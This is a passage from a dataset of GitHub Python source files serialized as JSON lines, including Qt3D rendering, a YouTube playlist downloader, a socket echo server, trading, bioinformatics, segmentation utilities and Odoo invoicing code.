QColor.fromRgb(0, 255, 0), self)\n\n self.plane = Qt3DCore.QEntity(self)\n\n self.planeMesh = Qt3DExtras.QPlaneMesh()\n Qt3DRender.QGeometryRenderer(self.planeMesh).setPrimitiveType(Qt3DRender.QGeometryRenderer.Lines)\n self.planeTransform = Qt3DCore.QTransform()\n self.planeMaterial = Qt3DExtras.QPhongMaterial(self)\n\n self.planeMesh.setWidth(10)\n self.planeMesh.setHeight(10)\n\n self.planeMesh.setMeshResolution(QSize(10, 10))\n\n self.planeTransform.setTranslation(QVector3D(0, 0, 0))\n # self.planeMaterial.setDiffuse(QColor(150, 150, 
150))\n # self.planeMaterial.setAmbient(QColor(150, 150, 150))\n\n self.plane.addComponent(self.planeMaterial)\n self.plane.addComponent(self.planeMesh)\n self.plane.addComponent(self.planeTransform)\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n\n view = Qt3DExtras.Qt3DWindow()\n view.setTitle(\"3D PySide2\")\n view.defaultFrameGraph().setClearColor(QColor(210, 210, 220))\n\n # scene = Scene()\n root = Qt3DCore.QEntity()\n\n e = []\n\n for i in range(-5, 6):\n for j in range(-5, 6):\n point = Point(QVector3D(i, j, 0))\n\n e += [point]\n\n point_transform = Qt3DCore.QTransform()\n point_transform.setTranslation(QVector3D(0, 0, 0)) # position\n\n e += [point_transform]\n\n # // this is my hacky way of setting point size\n # // the better way to do this is probably to create\n # // your own shader and then use QPointSize::SizeMode::Programmable\n # // that's for another journal...\n point_material = Qt3DExtras.QPhongMaterial()\n point_material.setAmbient(QColor(255, 0, 0))\n\n effect = point_material.effect()\n for t in effect.techniques():\n for rp in t.renderPasses():\n pointSize = Qt3DRender.QPointSize()\n pointSize.setSizeMode(Qt3DRender.QPointSize.SizeMode.Fixed)\n pointSize.setValue(4.0)\n rp.addRenderState(pointSize)\n e += [pointSize]\n\n e += [point_material]\n\n entity = Qt3DCore.QEntity(root)\n entity.addComponent(point)\n entity.addComponent(point_transform)\n entity.addComponent(point_material)\n\n e += [entity]\n\n # self.e += [Sphere(self, QVector3D(i, j, 0), 0.1)]\n # self.e.append(selfSphere(self, QVector3D(i, j, 0), 0.1))\n\n # Camera\n camera = view.camera()\n camera.lens().setPerspectiveProjection(65.0, 16.0 / 9.0, 0.1, 100.0)\n camera.setPosition(QVector3D(-5, 10, -20.0))\n camera.setViewCenter(QVector3D(0, 0, 0))\n\n\n\n# # For camera controls\n# camController = Qt3DExtras.QOrbitCameraController(scene)\n# camController.setLinearSpeed(50.0)\n# camController.setLookSpeed(180.0)\n# camController.setCamera(camera)\n\n view.setRootEntity(root)\n view.show()\n\n sys.exit(app.exec_())\n","repo_name":"pboettch/OrbitViewer","sub_path":"example/simple3d.py","file_name":"simple3d.py","file_ext":"py","file_size_in_byte":16601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7283930468","text":"import pytube\n\n''' Inspired by NeuralNine '''\n'''WARNING: DOWNLOADING COPYRIGHTED MATERIAL IS HIGHLY ILLEGAL!\nI DO NOT TAKE ANY RESPONSIBILITY FROM THE USAGE OF THIS TOOL!\nTHIS IS FOR EDUCATIONAL PURPOSES ONLY!'''\n\nurl = input(\"Paste Playlist URL\")\n\nplaylist = pytube.Playlist(url)\nfor url in playlist:\n\tvideo = pytube.Youtube(url)\n\tstream = video.streams.get_by_itag(22)\n\tprint(\"Downloading playlist...\")\n\tstream.download\n\tprint(\"Done!\")\n","repo_name":"luisppinto/youtube-downloader","sub_path":"playlist.py","file_name":"playlist.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"43210209326","text":"import socket\nimport logging\n\nlogging.basicConfig(\n filename='server.log',\n filemode='a',\n format='%(asctime)s - %(levelname)s - %(message)s',\n datefmt='%d-%b-%y %H:%M:%S',\n level=logging.DEBUG\n)\n\nlogging.debug('\\n')\nlogging.debug('Запуск сервера')\n\nsock = socket.socket() # инициализация сокета\nsock.settimeout(60)\n\n# Задаётся базовый порт\n\nport = int(input(\"Введите порт: \"))\n\nwhile True:\n try:\n sock.bind(('', port))\n except socket.error:\n logging.warning('Порт %s 
занят, поиск другого', port)\n port += 1\n else:\n logging.debug('Назначен порт %s', port)\n break\n\nlogging.debug('Прослушивание порта')\nsock.listen(1)\n\nwhile True:\n\n logging.debug('Ожидание подключения клиента')\n try:\n #Записываем адресс клиента\n conn, addr = sock.accept()\n except socket.timeout:\n try:\n logging.warning('Сервер бездействует, остановка ..')\n sock.shutdown(socket.SHUT_RDWR)\n except (socket.error, OSError, ValueError):\n pass\n break\n\n logging.debug('Клиент подключен, информация о нём: %s', addr)\n\n logging.debug('Обмен сообщениями с клиентом')\n while True:\n data = conn.recv(1024)\n if not data or (data.decode()).lower() == \"exit\":\n logging.debug('Клиент завершил обмен')\n break\n logging.debug('Сообщение от %s: %s', addr, data.decode())\n conn.send(data)\n\n conn.close()\n logging.debug('Клиент отключен')\n\nsock.close()\nlogging.debug('Сервер остановлен')\n","repo_name":"Rovenich/1_echo_server","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"ru","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"34963193707","text":"import talib as ta\nimport numpy as np\nimport pandas as pd\n\nclass TradingStrategy:\n \n def __init__(self, data):\n self.data = np.array(data)\n self.bars = data.index\n self.short = 20\n self.long = 50\n self.signals = self._generate_signals()\n \n \n def _generate_signals(self):\n '''This is truly the most important part.\n This piece will change everytime we want \n to test a different strategy\n '''\n # Create DataFrame and initialise signal series to zero\n signals = pd.DataFrame(index=self.bars)\n signals['signal'] = 0\n \n # Create the short/long simple moving averages\n signals['short_mavg'] = ta.SMA(self.data, self.short)\n signals['long_mavg'] = ta.SMA(self.data, self.long)\n \n # When the short SMA exceeds the long SMA, set the ‘signals’ Series to 1 (else 0)\n signals['signal'][self.short:] = \\\n np.where(signals['short_mavg'][self.short:] > \\\n signals['long_mavg'][self.short:], 1, 0)\n \n # Take the difference of the signals in order to generate actual trading orders\n signals['order'] = signals['signal'].diff()\n return signals","repo_name":"jsaperas/market_analysis","sub_path":"Backtesting/strategy.py","file_name":"strategy.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24285443142","text":"import os\nimport pandas as pd\nimport geopandas as gpd\n\n\n# only favorable soils are used (first 3 values) - no\n# table provided to separete one from another, but there is column in csv where\n# this can be specified (1=unfavorable) and values from columns 4-6 will be\n# taken in calculation also.\nletters = {\n 'A': [1, 0.96, 0.89, 1., 0.94, 0.79], # 0-2%\n 'B': [0.99, 0.95, 0.88, .99, .93, .78], # 2-4\n 'C': [0.97, 0.93, 0.86, .96, .90, .74], # 4-7\n 'D': [0.93, 0.89, 0.81, .91, .83, .69], # 7-12\n 'E': [0.87, 0.82, 0.75, .85, .78, .63], # 12-18\n 'F': [0.71, 0.66, 0.59, .68, .62, .47], # 18-35\n 'G': [0.52, 0.48, 0.40, .49, .43, .28], # 35-43\n 'H': [0.48, 0.44, 0.36, .45, .39, .24], # >43\n}\npth_fl = os.path.dirname(__file__)\npth_sr = os.path.join(pth_fl, '..', 'data', 'soil_ratings.csv')\n\n# this file contains 2 columns with values, one returns values equal to this\n# from book, others from written example on coda.io\n# all soils are marked as favorable as no source was specified to get proper\n# values\n# originating from this 
site:\n# https://www.nrcs.usda.gov/publications/University%20of%20Illinois%20Base%20Yield%20Indices%20%28for%20use%20in%20IL%20only%29%20-Query%20By%20Soil%20Survey%20Area.html#reportref # noqa\ndv = pd.read_csv(pth_sr)\n\n\ndef calculate_pi_val(code: str) -> int:\n if code not in dv.musym.values:\n return None\n slope_code = ''\n soil_code = ''\n letter = ''\n for li in letters.keys():\n if li in code:\n soil_code = code.split(li)[0]\n slope_code = code.split(li)[-1]\n slope_code = slope_code if slope_code in ['3', '2'] else ''\n letter = li\n\n if soil_code == '':\n slope_code = ''\n letter = 'A'\n # there are some other caps letters in soil names\n # like L but script will treat it as A\n\n val = dv[dv.musym == code].loc[:, 'value'].values[0]\n fav = dv[dv.musym == code].loc[:, 'unfavorable'].values[0]\n # this will use unfavorable columns [3:6] from letters\n fav = fav if fav == 0 else 3\n ind = 0\n if slope_code == '2':\n ind = 1\n elif slope_code == '3':\n ind = 2\n\n return round(val * letters[letter][int(ind+fav)])\n\n\ndef process_pi(pth: str) -> pd.DataFrame:\n df = gpd.read_file(pth, layer='mapunit', ignore_geometry=True)\n\n df.loc[:, 'pi'] = df.apply(lambda xx: calculate_pi_val(xx.musym), axis=1)\n return df[['mukey', 'pi']]\n\n\nif __name__ == '__main__':\n process_pi('/Users/pawel/freelance/ssurgo/gSSURGO_IL.gdb')\n","repo_name":"pawelkdevbase/ssurgo_db","sub_path":"soil_scripts/pi_calc.py","file_name":"pi_calc.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2776875646","text":"# coding=utf-8\n# user=hu\n\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport string\n\nall_characters = string.printable\nn_characters = len(all_characters)\n\n\n\n\n\n\ndef char_tensor(string):\n tensor = torch.zeros(len(string)).long()\n for c in range(len(string)):\n tensor[c] = ord(string[c])\n return Variable(tensor)\n\n\nclass Net(nn.Module):\n\n def __init__(self):\n super(Net, self).__init__()\n # 1 input image channel, 6 output channels, 5x5 square convolution\n # kernel\n self.conv1 = nn.Conv2d(1, 6, 5)\n self.conv2 = nn.Conv2d(6, 16, 5)\n # an affine operation: y = Wx + b\n self.fc1 = nn.Linear(16 * 5 * 5, 120)\n self.fc2 = nn.Linear(120, 84)\n self.fc3 = nn.Linear(84, 10)\n def forward(self, x):\n # Max pooling over a(2, 2) window\n x = F.max_pool2d(F.relu(self.conv1(x)), (2, 2))\n # If the size is a square you can only specify a single number\n x = F.max_pool2d(F.relu(self.conv2(x)), 2)\n x = x.view(-1, self.num_flat_features(x))\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n\n def num_flat_features(self, x):\n size = x.size()[1:] # all dimensions except the batch dimension\n num_features = 1\n for s in size:\n num_features *= s\n return num_features\n\n\ndef torch_y():\n tensor = torch.FloatTensor([[1, 2], [3, 4]])\n variable = Variable(tensor, requires_grad=True)\n print(tensor)\n print(variable)\n print(variable.data)\n t_out = torch.mean(tensor*tensor)\n v_out = torch.mean(variable*variable)\n print(t_out)\n print(v_out)\n print(variable.data.numpy())\n\n\nif __name__ == '__main__':\n print(char_tensor('123abc!!!胡阳杰'))\n # print(ord('胡'))\n # 
print(chr(2))\n","repo_name":"hyjalxl/yihuo","sub_path":"pytorch_yi/torch_test1.py","file_name":"torch_test1.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34786996189","text":"#!/usr/bin/env python\n\nfrom Bio import SeqIO\nfrom Bio.SeqRecord import SeqRecord\nfrom Bio.Seq import Seq\nimport re \nimport time\n\n\n### defaults\nDROSOPHILA_GENOME_FILE = \"genome/dmel-all-chromosome-r6.fasta\"\nDEFAULT_FORMAT = \"fasta\"\nKMER_SIZE = 6\nOUTFILE_KMER = \"unique_kmers.fasta\"\n\n\ndef read_sequences(file=DROSOPHILA_GENOME_FILE,format=DEFAULT_FORMAT):\n '''\n Reads the genome file in given format\n params\n file: path to file, default= DROSOPHILA_GENOME_FILE\n format: format of the file, default= FASTA\n '''\n unique_kmers = set()\n try:\n with open(OUTFILE_KMER,\"w\"):\n for seq_record in SeqIO.parse(file,format):\n if re.match(r\"^\\d{1,1}\\D*$\", seq_record.id):\n for kmer in _sliding_window(seq_record.seq,KMER_SIZE):\n unique_kmers.add(kmer)\n\n ## write the unique kmers to file in fasta\n write_unique_seq(unique_kmers) \n\n except FileNotFoundError as e:\n print(\"Please make sure path to the file is correct. \\n{0}\".format(e))\n\n except Exception as e:\n print(\"Error while find kmers : {0}\".format(e))\n\n\n\n\ndef write_unique_seq(unique_kmers):\n sequences = list()\n counter = 0\n for s in unique_kmers:\n counter += 1\n sequences.append(SeqRecord(Seq(s),id=\"id_\"+str(counter),description=\"Desc: kmer_\"+str(counter)))\n \n SeqIO.write(sequences,OUTFILE_KMER,DEFAULT_FORMAT)\n \n print(\"unique k-mers writen to file: {0}\".format(OUTFILE_KMER))\n print(\"Total unique k-mers found: {0}\".format(counter))\n\n\n\ndef _sliding_window(seq,window_size):\n '''\n print the k-mers of size window_size \n params:\n seq: seq string \n window_size: size of the k-mer \n rtype: array of k-mers\n '''\n start = 0\n end = len(seq) - window_size + 1\n print(\"length of the chromosome seq : {0}\".format(len(seq)))\n for pos in range(start,end):\n yield str(seq[pos:pos+window_size])\n\n\n\nif __name__==\"__main__\":\n start = time.time()\n read_sequences()\n end = time.time()\n print(\"Total Time for for execution : {0} secs.\".format(end-start))\n\n","repo_name":"sohailchd/bioinformaticsMethods","sub_path":"BioPython/bp_kmers.py","file_name":"bp_kmers.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"10484782816","text":"import datetime\n\nfrom flask_script import Command, Option\n\nfrom app import db\nfrom app.resources.news.models import NewsItem\n\n\nclass ParseNewsDesc(Command):\n \"\"\"\n Command to remove old feed items\n\n :arg verbose:\n print progress\n :arg dry:\n dry run\n \"\"\"\n\n option_list = [\n Option('--verbose', '-v', dest='verbose', action='store_true',\n default=False),\n Option('--dry', '-dry', dest='dry', action='store_true',\n default=False),\n ]\n\n def run(self, verbose, dry):\n if verbose:\n print('---' + str(datetime.datetime.utcnow()) + '---')\n print('Removing old feed entries...')\n\n try:\n items = NewsItem.query.order_by(NewsItem.row_id)\n print('records to process {}'.format(items.count()))\n start = 0\n batch = 1000\n while True:\n news_batch = items.offset(start).limit(batch).all()\n if not news_batch:\n break\n for item in news_batch:\n item.parse_description()\n db.session.add(item)\n db.session.commit()\n start += batch\n print('processed {} 
items'.format(start))\n except Exception as e:\n db.session.rollback()\n print(e)\n exit(1)\n\n print('---' + str(datetime.datetime.utcnow()) + '---')\n print('Done')","repo_name":"Witzcode0/Exchange-connect","sub_path":"commands/newsfeed/parse_news_desc.py","file_name":"parse_news_desc.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39118651903","text":"from typing import List\n\nfrom nucleus.prediction import PredictionList\n\nfrom .custom_types import BoxOrPolygonAnnoOrPred\nfrom .polygon_utils import polygon_annotation_to_shape\n\n\ndef polygon_area_filter(\n polygons: List[BoxOrPolygonAnnoOrPred], min_area: float, max_area: float\n) -> List[BoxOrPolygonAnnoOrPred]:\n filter_fn = (\n lambda polygon: min_area\n <= polygon_annotation_to_shape(polygon)\n <= max_area\n )\n return list(filter(filter_fn, polygons))\n\n\ndef confidence_filter(\n predictions: PredictionList, min_confidence: float\n) -> PredictionList:\n predictions_copy = PredictionList()\n filter_fn = (\n lambda prediction: not hasattr(prediction, \"confidence\")\n or prediction.confidence >= min_confidence\n )\n for attr in predictions.__dict__:\n predictions_copy.__dict__[attr] = list(\n filter(filter_fn, predictions.__dict__[attr])\n )\n return predictions_copy\n\n\ndef polygon_label_filter(\n polygons: List[BoxOrPolygonAnnoOrPred], label: str\n) -> List[BoxOrPolygonAnnoOrPred]:\n return list(filter(lambda polygon: polygon.label == label, polygons))\n","repo_name":"scaleapi/nucleus-python-client","sub_path":"nucleus/metrics/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"81"} +{"seq_id":"6002460111","text":"from __future__ import print_function\nimport torch\nimport numpy as np\nfrom PIL import Image\nimport os\nimport cv2\n\n\ndef get_surface_normals(depth, k):\n \"\"\"\n Estimates surface normals from depth data\n :param depth: 2D depth map (h,w)\n :param k: 3x3 camera intrinsic matrix\n :return: 3D estimation of surface normals (3, h-2, w-2)\n \"\"\"\n height, width = depth.shape\n\n def normalization(data):\n \"\"\"\n Applies normalization via Euclidean norm\n :param data: Input array\n :return: Normalized input array\n \"\"\"\n norm = np.sqrt(\n np.multiply(data[:, :, 0], data[:, :, 0])\n + np.multiply(data[:, :, 1], data[:, :, 1])\n + np.multiply(data[:, :, 2], data[:, :, 2])\n )\n norm = np.dstack((norm, norm, norm))\n return data / norm\n\n x, y = np.meshgrid(np.arange(0, width), np.arange(0, height)) # 2D to 3D conversion\n x = x.reshape([-1])\n y = y.reshape([-1])\n xyz = np.vstack((x, y, np.ones_like(x)))\n pts_3d = np.dot(np.linalg.inv(k), xyz * depth.reshape([-1]))\n pts_3d_world = pts_3d.reshape((3, height, width))\n f = pts_3d_world[:, 1: height - 1, 2:width] - pts_3d_world[:, 1: height - 1, 1: width - 1] # compute x and y diff\n t = pts_3d_world[:, 2:height, 1: width - 1] - pts_3d_world[:, 1: height - 1, 1: width - 1]\n normal_map = np.cross(f, t, axisa=0, axisb=0) # cross product and norm\n normal_map = normalization(normal_map)\n\n return normal_map.astype(np.float32)\n\n\ndef save_images(save_dir, visuals, image_name, image_size, prob_map):\n \"\"\"\n Creates visualizations of the prediction and saves it as an image\n :param save_dir: Save directory\n :param visuals: 'visuals' dict from the model\n :param image_name: Name of the image to be saved\n :param image_size: Size of 
the image (h, w)\n :param prob_map: TestOptions prob_map flag\n \"\"\"\n image_name = image_name[0]\n orig_size = (image_size[0].item(), image_size[1].item())\n image_palette = list(\n np.genfromtxt('datasets/palette.txt', dtype=np.uint8).reshape(3 * 256)) # load palette for binary prediction\n\n for label, im_data in visuals.items():\n if label == 'output':\n if prob_map:\n im = tensor_to_confidence_map(im_data)\n im = cv2.resize(im, orig_size)\n cv2.imwrite(os.path.join(save_dir, image_name + \".jpg\"), im)\n else:\n im = tensor_to_label_image(im_data, image_palette)\n im = cv2.resize(im, orig_size)\n cv2.imwrite(os.path.join(save_dir, image_name + \".jpg\"), cv2.cvtColor(im, cv2.COLOR_RGB2BGR))\n\n\ndef tensor_to_image(input_image, image_type=np.uint8):\n \"\"\"\n Converts tensor to image\n :param input_image: Tensor containing image data\n :param image_type: Data type of image\n :return: Converted image as numpy array\n \"\"\"\n if isinstance(input_image, torch.Tensor):\n image_tensor = input_image.data\n else:\n return input_image\n image_numpy = image_tensor[0].cpu().float().numpy()\n if image_numpy.shape[0] == 1: # greyscale to rgb (channel is duplicated)\n image_numpy = np.tile(image_numpy, (3, 1, 1))\n image_numpy = (np.transpose(image_numpy, (1, 2, 0))) * 255 # CHW to HWC, * 255 for visual\n return image_numpy.astype(image_type)\n\n\ndef tensor_to_label_image(label_tensor, image_palette, image_type=np.uint8):\n \"\"\"\n Converts tensor to label image (binary prediction)\n :param label_tensor: Input tensor\n :param image_palette: Color palette for the image\n :param image_type: Data type of image\n :return: Converted image as numpy array\n \"\"\"\n if len(label_tensor.shape) == 4: # if NCHW, take max scores on C\n _, label_tensor = torch.max(label_tensor.data.cpu(), 1)\n\n label_numpy = label_tensor[0].cpu().float().detach().numpy()\n label_image = Image.fromarray(label_numpy.astype(np.uint8))\n label_image = label_image.convert(\"P\")\n label_image.putpalette(image_palette)\n label_image = label_image.convert(\"RGB\")\n return np.array(label_image).astype(image_type)\n\n\ndef tensor_to_confidence_map(label_tensor, image_type=np.uint8):\n \"\"\"\n Converts tensor to confidence (probability) map\n :param label_tensor: Input tensor\n :param image_type: Data type of image\n :return: Converted image as numpy array\n \"\"\"\n softmax_numpy = label_tensor[0].cpu().float().detach().numpy()\n softmax_numpy = np.exp(softmax_numpy) # apply softmax to obtain probabilities\n label_image = np.true_divide(softmax_numpy[1], softmax_numpy[0] + softmax_numpy[1])\n label_image = np.floor(255 * (label_image - label_image.min()) / (\n label_image.max() - label_image.min())) # normalize, * 255 for visual\n return np.array(label_image).astype(image_type)\n\n\ndef confidence_map_to_overlay(rgb, conf_map):\n \"\"\"\n Applies a green tint overlay to the RGB image, based on the confidence map\n :param rgb: Input RGB image\n :param conf_map: Input confidence map\n :return: Input RGB image with the green overlay\n \"\"\"\n conf_map = conf_map / 255\n rgb[:, :, 0] = rgb[:, :, 0] * (1 - conf_map)\n rgb[:, :, 2] = rgb[:, :, 2] * (1 - conf_map)\n return rgb\n\n\ndef print_current_losses(epoch, i, losses, t_iter, t_data):\n \"\"\"\n Prints information related to the current losses\n :param epoch: Current epoch number\n :param i: Current iteration number\n :param losses: Dict containing the losses\n :param t_iter: Total time taken for current iteration\n :param t_data: Total time taken for current data 
processing\n \"\"\"\n message = '(Epoch: %d, Iters: %d, Time: %.3f, Data: %.3f) ' % (epoch, i, t_iter, t_data)\n for k, v in losses.items():\n message += '%s: %.3f ' % (k, v)\n print(message)\n\n\ndef mkdirs(paths):\n \"\"\"\n Creates directories\n :param paths: A string or a list of strings representing the path(s) to be created\n \"\"\"\n if isinstance(paths, list):\n for path in paths:\n if not os.path.exists(path):\n os.makedirs(path)\n elif isinstance(paths, str):\n if not os.path.exists(paths):\n os.makedirs(paths)\n\n\ndef get_confusion_matrix(x, y, n, ignore_label=None, mask=None):\n \"\"\"\n Computes a confusion matrix of n classes\n :param x: True labels\n :param y: Predicted labels\n :param n: Number of classes\n :param ignore_label: Optional label to be ignored\n :param mask: Optional mask to exclude certain labels\n :return: 2D confusion matrix (n, n)\n \"\"\"\n if mask is None: # if None, set mask to include all labels\n mask = np.ones_like(x) == 1\n k = (x >= 0) & (y < n) & (x != ignore_label) & (mask.astype(np.bool)) # create binary mask using the inputs\n # np.bincount's parameter can be seen as a 'shifting' of the labels into their respective cells from the matrix\n # Apply np.bincount and reshape to obtain the effective counts and the 2D form\n return np.bincount(n * x[k].astype(int) + y[k], minlength=n ** 2).reshape(n, n)\n\n\ndef get_metrics(conf_matrix):\n \"\"\"\n Computes metrics based on the confusion matrix\n :param conf_matrix: 2D confusion matrix\n :return: Accuracy, precision, recall, F1-score, IoU as floats\n \"\"\"\n if conf_matrix.sum() == 0: # Zero entries in the matrix => zero valued metrics\n return 0, 0, 0, 0, 0\n with np.errstate(divide='ignore', invalid='ignore'):\n accuracy = np.diag(conf_matrix).sum() / np.float(conf_matrix.sum())\n class_precision = np.diag(conf_matrix) / conf_matrix.sum(0).astype(np.float)\n class_recall = np.diag(conf_matrix) / conf_matrix.sum(1).astype(np.float)\n iou = np.diag(conf_matrix) / (conf_matrix.sum(1) + conf_matrix.sum(0) - np.diag(conf_matrix)).astype(np.float)\n precision = class_precision[1]\n recall = class_recall[1]\n f_score = 2 * (recall * precision) / (recall + precision)\n return accuracy, precision, recall, f_score, iou[1]\n","repo_name":"RobertCojocariu9/FSEstimation","sub_path":"util/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":7978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15060004927","text":"# -*- coding: utf-8 -*-\r\nimport logging\r\n\r\nimport top.api\r\nimport syl\r\n\r\n\r\ndef send_vcode(to_phone, username, vcode):\r\n logger = logging.getLogger(__name__)\r\n url = 'gw.api.taobao.com'\r\n port = 80\r\n req = top.api.AlibabaAliqinFcSmsNumSendRequest(url, port)\r\n req.set_app_info(top.appinfo(syl.settings.SMS['appkey'], syl.settings.SMS['secret']))\r\n \r\n req.extend = \"123456\"\r\n req.sms_type = \"normal\"\r\n req.sms_param = \"{\\\"vcode\\\":\\\"\" + str(vcode) + \"\\\",\\\"username\\\":\\\"\" + username.replace(',', ' ').encode('utf-8') + \"\\\"}\"\r\n req.rec_num = to_phone.encode('utf-8')\r\n req.sms_template_code = syl.settings.SMS['sms_template_code']\r\n req.sms_free_sign_name = \"四月儿\"\r\n \r\n try:\r\n resp = req.getResponse()\r\n logger.info(resp)\r\n return True\r\n except Exception as e:\r\n logger.error(e)\r\n return 
False\r\n","repo_name":"llv8/syl","sub_path":"cust/send_sms.py","file_name":"send_sms.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14222658860","text":"from pythonosc import dispatcher\nfrom pythonosc import osc_server\nimport microphone_server\n\nTOGGLE_PERFORMANCE = False\n\ndef rb1(*args):\n global TOGGLE_PERFORMANCE\n val = args[-1]\n if val == 1.0 and TOGGLE_PERFORMANCE is not True:\n print(\"Starting performance\")\n microphone_server.run()\n\ndef s1(*args):\n val = args[-1]\n print(val)\n\n\ndispatcher = dispatcher.Dispatcher()\ndispatcher.map(\"/rb1\", rb1 )\ndispatcher.map(\"/s1\", s1 )\n\nserver = osc_server.ThreadingOSCUDPServer((\"localhost\", 7406), dispatcher)\nprint(\"Serving on {}\".format(server.server_address))\nprint(\"Press rb1 to the performance:\".format(server.server_address))\n\nserver.serve_forever()\n","repo_name":"samhains/lipp_performance_3","sub_path":"python/osc_server.py","file_name":"osc_server.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72150321864","text":"import base64\nfrom html import unescape\n\nfrom lxml import etree\nfrom odoo import models, api, _, fields\nfrom odoo.exceptions import UserError\nimport logging\n\n_logger = logging.getLogger(__name__)\n\n\nclass AccountMove(models.Model):\n _inherit = 'account.move'\n\n departure_address = fields.Char(\"Departure Address\")\n departure_city = fields.Char(\"Departure City\")\n departure_state = fields.Char(\"Departure State\")\n\n @api.onchange('partner_id')\n def _onchange_partner_id(self):\n config = self.env['fiscal.dte.printing.config'].search([('company_id', '=', self.company_id.id)])\n if not config:\n raise UserError(_(\"Configuration for DTE Printing Format Not Found, Company: %s \" % self.company_id.name))\n if config and self.move_type in self.get_invoice_types() and self.journal_id.type == 'sale':\n if self.partner_id and self.partner_id.l10n_cl_sii_taxpayer_type == '3':\n self.l10n_latam_document_type_id = config.voucher_document_type.id\n\n def _is_doc_type_voucher(self):\n res = False\n if self.l10n_latam_document_type_id.code in ['35', '39', '906', '45', '46', '70', '71']:\n res = True\n for ref_rec in self.l10n_cl_reference_ids:\n found = False\n if ref_rec.l10n_cl_reference_doc_type_selection == '39' and not found:\n res = True\n found = True\n if ref_rec.l10n_cl_reference_doc_type_selection == '61' and not found:\n origin_doc = self.env['account.move'].search([]).filtered(\n lambda inv: inv.l10n_latam_document_number == ref_rec.origin_doc_number)\n for ref_orig_rec in origin_doc:\n if ref_orig_rec and ref_orig_rec.l10n_latam_document_type_id.code == '39' and not found:\n res = True\n found = True\n return res\n\n # CCU REDEFINED\n\n def _l10n_cl_create_dte(self):\n if self._is_doc_type_voucher():\n self._ccu_l10n_cl_create_dte()\n else:\n super(AccountMove, self)._l10n_cl_create_dte()\n\n def _l10n_cl_create_dte_envelope(self, receiver_rut='60803000-K'):\n if self._is_doc_type_voucher():\n dte_signed, file_name = self._ccu_l10n_cl_create_dte_envelope(receiver_rut)\n else:\n dte_signed, file_name = super(AccountMove, self)._l10n_cl_create_dte_envelope(receiver_rut)\n return dte_signed, file_name\n\n def l10n_cl_send_dte_to_sii(self, retry_send=True):\n if self._is_doc_type_voucher():\n self.ccu_l10n_cl_send_dte_to_sii(retry_send)\n else:\n super(AccountMove, 
self).l10n_cl_send_dte_to_sii(retry_send)\n\n # CCU METHODS\n def _ccu_l10n_cl_create_dte(self):\n folio = int(self.l10n_latam_document_number)\n doc_id_number = 'B{}T{}'.format(folio, self.l10n_latam_document_type_id.code)\n dte_barcode_xml = self._l10n_cl_get_dte_barcode_xml()\n self.l10n_cl_sii_barcode = dte_barcode_xml['barcode']\n dte = self.env.ref('l10n_cl_edi.dte_template')._render({\n 'move': self,\n 'format_vat': self._l10n_cl_format_vat,\n 'get_cl_current_strftime': self._get_cl_current_strftime,\n 'format_length': self._format_length,\n 'doc_id': doc_id_number,\n 'caf': self.l10n_latam_document_type_id._get_caf_file(self.company_id.id,\n int(self.l10n_latam_document_number)),\n 'amounts': self._l10n_cl_get_amounts(),\n 'withholdings': self._l10n_cl_get_withholdings(),\n 'dte': dte_barcode_xml['ted'],\n })\n dte = unescape(dte.decode('utf-8')).replace(r'&', '&')\n digital_signature = self.company_id._get_digital_signature(user_id=self.env.user.id)\n signed_dte = self._sign_full_xml(\n dte, digital_signature, doc_id_number, 'doc', self.l10n_latam_document_type_id._is_doc_type_voucher())\n dte_attachment = self.env['ir.attachment'].create({\n 'name': 'DTE_{}.xml'.format(self.name),\n 'res_model': self._name,\n 'res_id': self.id,\n 'type': 'binary',\n 'datas': base64.b64encode(signed_dte.encode('ISO-8859-1'))\n })\n self.l10n_cl_dte_file = dte_attachment.id\n\n def _ccu_l10n_cl_create_dte_envelope(self, receiver_rut='60803000-K'):\n file_name = 'B{}T{}.xml'.format(self.l10n_latam_document_number, self.l10n_latam_document_type_id.code)\n digital_signature = self.company_id._get_digital_signature(user_id=self.env.user.id)\n template = self.l10n_latam_document_type_id._is_doc_type_voucher() and self.env.ref(\n 'l10n_cl_edi.envio_boleta') or self.env.ref('l10n_cl_edi.envio_dte')\n dte_rendered = template._render({\n 'move': self,\n 'RutEmisor': self._l10n_cl_format_vat(self.company_id.vat),\n 'RutEnvia': digital_signature.subject_serial_number,\n 'RutReceptor': receiver_rut,\n 'FchResol': self.company_id.l10n_cl_dte_resolution_date,\n 'NroResol': self.company_id.l10n_cl_dte_resolution_number,\n 'TmstFirmaEnv': self._get_cl_current_strftime(),\n 'dte': base64.b64decode(self.l10n_cl_dte_file.datas).decode('ISO-8859-1')\n })\n dte_rendered = 